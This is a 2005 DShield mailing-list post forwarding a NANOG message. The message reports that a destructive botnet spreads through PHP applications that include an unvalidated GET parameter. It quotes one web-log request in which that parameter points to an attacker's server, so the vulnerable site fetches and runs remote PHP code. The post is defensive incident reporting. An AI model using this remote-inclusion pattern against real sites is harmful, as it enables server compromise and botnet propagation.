[Dshield] [Fwd: Re:Destructive botnet originating from Japan]
cbrenton at chrisbrenton.org
Sat Dec 24 10:46:34 GMT 2005
And the follow-up that includes the point of infection. This was covered
in the diary a few days ago.
-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Fri, 23 Dec 2005 16:20:00 -0800
> Well, it appears that bad code always seems to be the root of
> problems. According to our research today, the problem appears to be
> caused by incorrectly written PHP applications that perform includes
> using a string without running any validation against the string.
> When the include executes, the test string passed from the GET
> includes execution instructions:
> "GET /index.php?test=http%3A//184.108.40.206/....? HTTP/1.0" 200
> 8010 "-" "Wget/1.6"
> It appears that the attacker at 220.127.116.11 (also the botnet hosting
> IRC server) is spreading his code as the include is called, pulling
> and executing PHP code from a remote server that injects the software.
> I'm not sure if this needs to be alerted to anyone outside of this
> list, but it's pretty nasty.